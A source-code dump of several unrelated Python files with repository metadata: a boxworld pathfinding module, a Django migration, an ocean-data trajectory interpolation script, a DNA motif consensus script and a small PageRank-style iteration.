'EDGES_ON': False, 'CENTER_ON': False, 'BOXLINES_ON': False, 'BOXUSED_ON': False, 'TREE_ON': True, 'PATH_ON': True, } search_modes = list(SEARCHES.keys()) class Box(object): '''A single box for boxworld. ''' def __init__(self, coords=(0,0,0,0), kind='.'): # keep status self.kind = kind self.color = box_kind_color[kind] self.marker = None # nav graph node self.node = None self.idx = -1 # pretty labels... self.idx_label = None self.pos_label = None self.marker_label = None # position using coordinates self.reposition(coords) def reposition(self, coords): # top, right, bottom, left pts = self.coords = coords # points for drawing self._pts = ( Point2D(pts[3], pts[0]), # top left Point2D(pts[1], pts[0]), # top right Point2D(pts[1], pts[2]), # bottom right Point2D(pts[3], pts[2]) # bottom left ) # vector-centre point self._vc = Point2D((pts[1]+pts[3])/2.0, (pts[0]+pts[2])/2.0) # labels may need to be updated self._reposition_labels() def _reposition_labels(self): # reposition labels if we have any if self.idx_label: self.idx_label.x = self._vc.x self.idx_label.y = self._vc.y self.pos_label.x = self._vc.x self.pos_label.y = self._vc.y if self.marker_label: self.marker_label.x = self._vc.x self.marker_label.y = self._vc.y #self._vc.y - (self.marker_label.content_height // 2) def set_kind(self, kind): 'Set the box kind (type) using string a value ("water","mud" etc)' kind = box_kind_map.get(kind, kind) try: self.kind = kind self.color = box_kind_color[kind] except KeyError: print('not a known tile kind "%s"' % kind) def draw(self): # draw filled box egi.set_pen_color(self.color) egi.closed_shape(self._pts, filled=True) # draw box border if cfg['BOXLINES_ON']: egi.set_pen_color((.7,.7,.7,1)) egi.closed_shape(self._pts, filled=False) # centre circle if cfg['CENTER_ON']: egi.set_pen_color((.3,.3,1,1)) egi.circle(self._vc, 5) # box position (simple column,row) (or x,y actually) if self.node: if cfg['LABELS_ON']: if not self.idx_label: info = "%d" % self.idx self.idx_label = pyglet.text.Label(info, color=(0,0,0,255), anchor_x="center", anchor_y="top") info = "(%d,%d)" % (self.pos[0], self.pos[1]) self.pos_label = pyglet.text.Label(info, color=(0,0,0,255), anchor_x="center", anchor_y="bottom") self._reposition_labels() self.idx_label.draw() #self.pos_label.draw() if self.marker: if not self.marker_label or self.marker_label.text != self.marker: self.marker_label = pyglet.text.Label(self.marker, color=(255,0,0,255), bold=True, anchor_x="center", anchor_y="center") self._reposition_labels() self.marker_label.draw() class BoxWorld(object): '''A world made up of boxes. ''' def __init__(self, nx, ny, cx, cy): self.boxes = [None]*nx*ny self.nx, self.ny = nx, ny # number of box (squares) for i in range(len(self.boxes)): self.boxes[i] = Box() self.boxes[i].idx = i # use resize to set all the positions correctly self.cx = self.cy = self.wx = self.wy = None self.resize(cx, cy) # create nav_graph self.path = None self.graph = None self.reset_navgraph() self.start = None self.target = None def get_box_by_index(self, ix, iy): idx = (self.nx * iy) + ix return self.boxes[idx] if idx < len(self.boxes) else None def get_box_by_pos(self, x, y): idx = (self.nx * (y // self.wy)) + (x // self.wx) return self.boxes[idx] if idx < len(self.boxes) else None def update(self, delta): pass def draw(self): for box in self.boxes: box.draw() if cfg['EDGES_ON']: egi.set_pen_color(name='LIGHT_BLUE') for node, edges in self.graph.edgelist.items(): # print node, edges for dest in edges: egi.line_by_pos(self.boxes[node]._vc, self.boxes[dest]._vc) if self.path: # put a circle in the visited boxes? if cfg['BOXUSED_ON']: egi.set_pen_color(name="GREEN") for i in self.path.closed: egi.circle(self.boxes[i]._vc, 10) if cfg['TREE_ON']: egi.set_stroke(3) # Show open edges route = self.path.route egi.set_pen_color(name='GREEN') for i in self.path.open: egi.circle(self.boxes[i]._vc, 10) # show the partial paths considered egi.set_pen_color(name='ORANGE') for i,j in route.items(): egi.line_by_pos(self.boxes[i]._vc, self.boxes[j]._vc) egi.set_stroke(1) if cfg['PATH_ON']: # show the final path delivered egi.set_pen_color(name='RED') egi.set_stroke(2) path = self.path.path for i in range(1,len(path)): egi.line_by_pos(self.boxes[path[i-1]]._vc, self.boxes[path[i]]._vc) egi.set_stroke(1) def resize(self, cx, cy): self.cx, self.cy = cx, cy # world size self.wx = (cx-1) // self.nx self.wy = (cy-1) // self.ny # int div - box width/height for i in range(len(self.boxes)): # basic positions (bottom left to top right) x = (i % self.nx) * self.wx y = (i // self.nx) * self.wy # top, right, bottom, left coords = (y + self.wy -1, x + self.wx -1, y, x) self.boxes[i].reposition(coords) def _add_edge(self, from_idx, to_idx, distance=1.0): b = self.boxes if b[to_idx].kind not in no_edge: # stone wall cost = edge_cost(b[from_idx].kind, b[to_idx].kind) self.graph.add_edge(Edge(from_idx, to_idx, cost*distance)) def _manhattan(self, idx1, idx2): ''' Manhattan distance between two nodes in boxworld, assuming the minimal edge cost so that we don't overestimate the cost). ''' x1, y1 = self.boxes[idx1].pos x2, y2 = self.boxes[idx2].pos return (abs(x1-x2) + abs(y1-y2)) * min_edge_cost def _hypot(self, idx1, idx2): '''Return the straight line distance between two points on a 2-D Cartesian plane. Argh, Pythagoras... trouble maker. ''' x1, y1 = self.boxes[idx1].pos x2, y2 = self.boxes[idx2].pos return hypot(x1-x2, y1-y2) * min_edge_cost def _max(self, idx1, idx2): '''Return the straight line distance between two points on a 2-D Cartesian plane. Argh, Pythagoras... trouble maker. ''' x1, y1 = self.boxes[idx1].pos x2, y2 = self.boxes[idx2].pos return max(abs(x1-x2),abs(y1-y2)) * min_edge_cost def reset_navgraph(self): ''' Create and store a new nav graph for this box world configuration. The graph is build by adding NavNode to the graph for each of the boxes in box world. Then edges are created (4-sided). ''' self.path = None # invalid so remove if present self.graph = SparseGraph() # Set a heuristic cost function for the search to use #self.graph.cost_h = self._manhattan self.graph.cost_h = self._hypot #self.graph.cost_h = self._max nx, ny = self.nx, self.ny # add all the nodes required for i, box in enumerate(self.boxes): box.pos = (i % nx, i // nx) #tuple position box.node = self.graph.add_node(Node(idx=i)) # build all the edges required for this world for i, box in enumerate(self.boxes): # four sided N-S-E-W connections if box.kind in no_edge: continue # UP (i + nx) if (i+nx) < len(self.boxes): self._add_edge(i, i+nx) # DOWN (i - nx) if (i-nx) >= 0: self._add_edge(i, i-nx) # RIGHT (i + 1) if (i%nx + 1) < nx: self._add_edge(i, i+1) # LEFT (i - 1) if (i%nx - 1) >= 0: self._add_edge(i, i-1) # Diagonal connections # UP LEFT(i + nx - 1) j = i + nx if (j-1) < len(self.boxes) and (j%nx - 1) >= 0: self._add_edge(i, j-1, 1.4142) # sqrt(1+1) # UP RIGHT (i + nx + 1) j = i + nx if (j+1) < len(self.boxes) and (j%nx + 1) < nx: self._add_edge(i, j+1, 1.4142) # DOWN LEFT(i - nx - 1) j = i - nx if (j-1) >= 0 and (j%nx - 1) >= 0: self._add_edge(i, j-1, 1.4142) # DOWN RIGHT (i - nx + 1) j = i - nx if (j+1) >= 0 and (j%nx +1) < nx: self._add_edge(i, j+1, 1.4142) def set_start(self, idx): '''Set the start box based on its index idx value. ''' # remove any existing start node, set new start node if self.target == self.boxes[idx]: print("Can't have the same start and end boxes!") return if self.start: self.start.marker = None self.start = self.boxes[idx] self.start.marker = 'S' def set_target(self, idx): '''Set the target box based on its index idx value. ''' # remove any existing target node, set new target node if self.start == self.boxes[idx]: print("Can't have the same start and end boxes!") return if self.target is not None: self.target.marker = None self.target = self.boxes[idx] self.target.marker = 'T' def plan_path(self, search, limit): '''Conduct a nav-graph search from the current world start node to the current target node, using a search method that matches the string specified in `search`. ''' cls = SEARCHES[search] self.path = cls(self.graph, self.start.idx, self.target.idx, limit) @classmethod def FromFile(cls, filename, pixels=(500,500) ): '''Support a the construction of a BoxWorld map from a simple text file. See the module doc details at the top of this file for format details. ''' # open and read the file f = open(filename) lines = [] for line in f.readlines(): line = line.strip() if line and not line.startswith('#'): lines.append(line) f.close() # first line is the number of boxes width, height nx, ny = [int(bit) for bit in lines.pop(0).split()] # Create a new BoxWorld to store all the new boxes in... cx, cy = pixels world = BoxWorld(nx, ny, cx, cy) # Get and set the Start and Target tiles s_idx, t_idx = [int(bit) for bit in lines.pop(0).split()] world.set_start(s_idx) world.set_target(t_idx) # Ready to process each line assert len(lines) == ny, "Number of rows doesn't match data." # read each line idx = 0 for line in reversed(lines): # in reverse order bits = line.split() assert len(bits) == nx, "Number of columns doesn't match data." for bit in bits: bit = bit.strip() assert bit in box_kind, "Not a known box type: "+bit world.boxes[idx].set_kind(bit) idx += 1 return world
feeaa15cae7e0454a3ad30921c8a3a80199f4399
910be469257538bcbbd15e894679856a1d311252
/server/service/trade/migrations/0006_auto_20161219_0232.py
f61cdfb26a888fc0d4d146d69de0dfe9c9a9cfb8
[]
no_license
bopo/bankeys2
ece7e7faa93aab48bf5a336721bfa69b33a870d8
5a81f5f4cd6442aade444444ba768b9ffa9dcbd4
refs/heads/master
2023-08-19T04:16:12.063961
2023-08-04T09:09:00
2023-08-04T09:09:00
119,646,417
1
0
null
null
null
null
UTF-8
Python
false
false
588
py
# -*- coding: utf-8 -*- # Generated by Django 1.10.4 on 2016-12-19 02:32 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('trade', '0005_auto_20161219_0230'), ] operations = [ migrations.AlterField( model_name='transfer', name='type', field=models.CharField(choices=[('0', '\u626b\u7801\u652f\u4ed8'), ('1', '\u7b2c\u4e09\u65b9\u652f\u4ed8')], default=0, max_length=100, verbose_name='\u6d88\u8d39\u7c7b\u578b'), ), ]
52b3f97fc61218cd38c7bea2e300e88231fcb7d5
25a4e5a76b06e6e677a2e08973e7d03f9b31300d
/Orile_tensoflow/first.py
f7c16104969646bc34b979a1260acf6d351665ca
[]
no_license
ducksfrogs/machine_learning_lessons
f4da81c7eb40fd1288a3e5614e111d0b5f780e06
5fe0ecffd45206cfd81e0a13069033f90317371e
refs/heads/master
2022-12-12T02:24:28.769446
2020-08-03T02:13:10
2020-08-03T02:13:10
281,533,511
0
0
null
null
null
null
UTF-8
Python
false
false
89
py
import matplotlib import matplotlib.pyplot as plt import numpy as np import pandas as pd
a2e966e841bf6ddb259d95be44428c8325a429fc
0bb36716a1edcdd38979201baf75230e769ba8b7
/examples/trajectory.py
32f20ca2eb0f2fb02bdb890c44f00c3dc388cca7
[ "Unlicense" ]
permissive
NOAA-ORR-ERD/gridded
6759df63af86e606bba9722132619a464aae4715
e89345cc5a5889d20c182e2c194a44bb45dfc575
refs/heads/master
2023-08-16T16:28:56.838870
2023-08-14T18:28:38
2023-08-14T18:28:38
79,688,194
60
17
Unlicense
2023-04-04T17:55:55
2017-01-22T02:38:59
Python
UTF-8
Python
false
false
1,308
py
# coding: utf-8 # # Trajectory Test # In[1]: get_ipython().magic('matplotlib inline') import matplotlib.pyplot as plt import numpy.ma as ma import numpy as np import netCDF4 import gridded # In[2]: url = 'http://geoport.whoi.edu/thredds/dodsC/examples/bora_feb.nc' # In[3]: nc = netCDF4.Dataset(url) lon = nc['lon_rho'][:] lat = nc['lat_rho'][:] temp = nc['temp'][-1,-1,:,:] # In[4]: x = np.linspace(13., 15.) y = np.linspace(45.3, 43.5) len(x) # In[5]: plt.pcolormesh(lon,lat,ma.masked_invalid(temp),vmin=5,vmax=15,cmap='jet'); plt.plot(x,y,'-') plt.grid() plt.colorbar(); # In[6]: temperature = gridded.Variable.from_netCDF(filename=url, name='Temperature', varname='temp') salinity = gridded.Variable.from_netCDF(filename=url, name='Salinity', varname='salt', grid=temperature.grid) points = np.column_stack((x,y)) t0 = temperature.time.max_time # ## Interpolate values at array of lon,lat points at specific time # In[7]: salts = salinity.at(points, t0) # In[8]: temps = temperature.at(points, t0) # In[9]: plt.plot(temps) # In[10]: times = temperature.time.data # ## Interpolate values at lon,lat points with changing time values # In[11]: over_time = [temperature.at((x[i],y[i]), val)[0] for i,val in enumerate(times)] # In[12]: plt.plot(over_time)
c99f0e732f3e0dd93828549b9b6022010efa53d7
2ffdfe188859d5be1a427ce1c4457d41331b541c
/message/Count(Motifs) +Consensus(Motifs).py
e152c4cf7f124a1bd34f2be65e7e0181a8a61b2a
[]
no_license
Hydebutterfy/learn-python
18504b0c7281c2b0f94dbc73e77da87c8ac3ff38
883614deaf0a3cdf46d8305197fe5659fd609d60
refs/heads/master
2021-01-24T11:59:44.883949
2016-12-02T07:48:40
2016-12-02T07:48:40
59,213,755
1
0
null
null
null
null
UTF-8
Python
false
false
862
py
def Count(Motifs): count = {} k = len(Motifs[0]) for symbol in "ACGT": count[symbol] = [] for j in range(k): count[symbol].append(0) t=len(Motifs) for i in range(t): for j in range(k): symbol=Motifs[i][j] count[symbol][j] += 1 return count def Consensus(Motifs): k = len(Motifs[0]) count = Count(Motifs) consensus = "" for j in range(k): m=0 frequentSymbol = "" for symbol in "ACGT": if count[symbol][j] > m: m = count[symbol][j] frequentSymbol = symbol consensus += frequentSymbol return consensus Motifs=[] filename = input("Enter file1 name: ") fileread = open(filename,"r") for i in fileread: dna = i.strip() Motifs.append(dna.upper()) print (Consensus(Motifs))
f356bab78b052e54ab2b39f5b35a6e23804fa954
372128141eb3bbbcd40585aa42de63fb9c9f474a
/CS333/lab12.py
c6f9fce906e9deb6d2dd7a8345a06e7f6275fc86
[]
no_license
CharlesGe129/DailyScripts
6120b9a6937331106466f631953fe5e7890a5173
ed71e476a312a4ca0b98da4b5eec76cb80624661
refs/heads/master
2021-08-07T00:01:03.126998
2018-11-28T17:51:42
2018-11-28T17:51:42
104,777,361
0
0
null
null
null
null
UTF-8
Python
false
false
478
py
def iterate(times, tax, funcs): (a, b, c) = (1, 1, 1) fac = 1 - tax for i in range(times): a1 = fac*funcs[0](a, b, c) + tax b1 = fac*funcs[1](a, b, c) + tax c1 = fac*funcs[2](a, b, c) + tax (a, b, c) = (a1, b1, c1) print(f"#{i+1}: a={a}, b={b}, c={c}") def s1(a, b, c): return c def s2(a, b, c): return 0.5 * a def s3(a, b, c): return 0.5*a + b if __name__ == '__main__': iterate(5, 0.15, [s1, s2, s3])